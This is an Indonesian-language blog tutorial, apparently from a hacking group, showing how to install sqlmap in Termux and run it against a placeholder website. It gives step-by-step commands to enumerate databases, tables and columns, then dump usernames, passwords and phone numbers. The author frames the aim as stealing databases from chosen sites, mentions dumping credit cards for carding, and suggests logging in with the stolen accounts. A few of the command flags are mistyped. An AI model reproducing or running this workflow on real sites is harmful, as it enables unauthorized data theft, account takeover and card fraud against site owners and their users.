CARA MENGGUNAKAN SQLMAP DI TERMUX

 Kali Ini Saya Akan Membuat Tutorial SQLMAP Di Termux

   SQLMAP adalah tools opensource yang mendeteksi dan melakukan exoloit pada bug SQL injection secara otomatis. Dengan melakukan seranggan SQL injection seorang attacker dapat mengambil alih serta memanipulasi sebuah database di dalam sebuah server.

Maka Dari itu, kita bisa mencuri atau mengambil database dari sebuah website yang kita inginkan, tapi harus yang vulnerable ( memiliki celah ) agar bisa di masuki, karna dari celahnya tersebut kita bisa melihat data – data nya, dan belum pasti semua data, dan keberuntungan juga di perlukan :v.

   Dan jika saja kita lagi beruntung, kita bisa saja mendapat CC ( Credit Card / kartu kredit ) bagi yang suka carding, bisa dump cc disini hehe..

Baik, Intronya cukup segitu saja, dan mari langsung menjalankan Tools nya..

~Saya Tidak Bertanggung Jawab Dengan Kesalahan Yang Anda Lakukan~

Ok.. langsung saja kita Jalankan

Bahan- bahan yang di butuhkan :

~HP Dengan Versi Lolipop Ke Atas ( versi 5.0 + )

~Aplikasi Termux ( Termux hanya bisa di HP Versi Lolipop Ke Atas )

~Koneksi Internet Lancar

~Kesabaran :V , Soalnya Perlu pengumpulan Database Nanti, Dan Untuk Cepat Lambat nya, bergantung koneksi internet anda beserta database website nya hehe.

  Yang Pertama :

♠ Buka Aplikasi Termux

~ Kalau sudah, kita update dulu package nya dengan perintah :

     $apt update –y

~ Lanjut dengan Menginstall Python

     $apt  install python python2 –y

~ Lanjut dengan menginstall git agar bisa cloning

     $apt install git

~ Sekarang eksekusi Tool nya

     $git clone https://github.com/sqlmapproject/sqlmap

~ Lanjut masuk ke directory Tool

     $cd sqlmap

~ Sekarang jalankan..

     $python2 sqlmap.py

Nahh… Kita Sudah siap Untuk menginstall SQLMAP, skrang tinggal cara penggunaan. :

Kita buat contoh website target : http://www.contoh.com/product.php?id=1

Ok, Itu sebagai  contoh Untuk kita masuki database nya..

Ketikkan Perintah Berikut :

 $python2 sqlmap.py -u http://www.contoh.com/product.php?id=1 --dbs

Dan tekan Enter..

Kalau vuln, Nanti akan Di tunjukkan nama” Database nya, contoh :

*information_schema

*sdgsd4484sd

Nah itulah contoh database nya, Kita buka database

*sdgsd4488sd

Karena yang information_schema nggak ada gunanya :v

Lanjut untuk membuka, ketik perintah :

$python2 sqlmap.py -u http://www.contoh.com/product.php?id=1 –D asgsd4488sd –tables

Nanti akan di beikan informasi” dalam bentuk table, beserta nama- nama dalam table nya,  tapi belum cukup, kita harus membuka lebih dalam lagi..

$ $python2 sqlmap.py -u http://www.contoh.com/product.php?id=1 -D

Asgsd4488sd –T users --columns

Untuk memberikan dalam bentuk Kolom Dari Tabel users, maka disitu nanti akan tertera apa aja yg ada di dalam table nya, tapi biasanya yang ada : email, phone, username, password, phone

Nah tinggal kita dump untuk mengetahui username dan password nya

$ python2 sqlmap.py -u http://www.contoh.com/product.php?id=1 -D

Asgsd4488sd –T users –C username,password,phone –dump

Kalau sudah, nanti akan diberikan Username , password, dan nomor hp, jad itinggal kita masukkan ke website tersebut dan kita sudah bisa memasuki sebagai user ( pengguna )

·        --dbs         = Untuk memberikan Database

·        -D             = Nama Database nya

·        -u              = URL dari website yang mau di dump

·        --tables     = Untuk memberikan nama – nama table

·        -T              = Nama Tabel

·        --columns = Untuk memberikan data yang ada pada table

·        -C             = Nama – nama di dalam kolom

·        --dump     = proses akhir untuk mendapatkan username, password   

                        dan Nomor Handphone

Baik, Sekian Saja yang dapat saya berikan, Jika ada kesalahan saya mohon maaf, dan bisa komentar di bawah J.. Kritik Dan Saran sangat di butuhkan untuk mengembangkan blogspot kita ini.. Wassalam.

#Mr.Dellay

#Adenn

#CYBER|ARMY|TEAM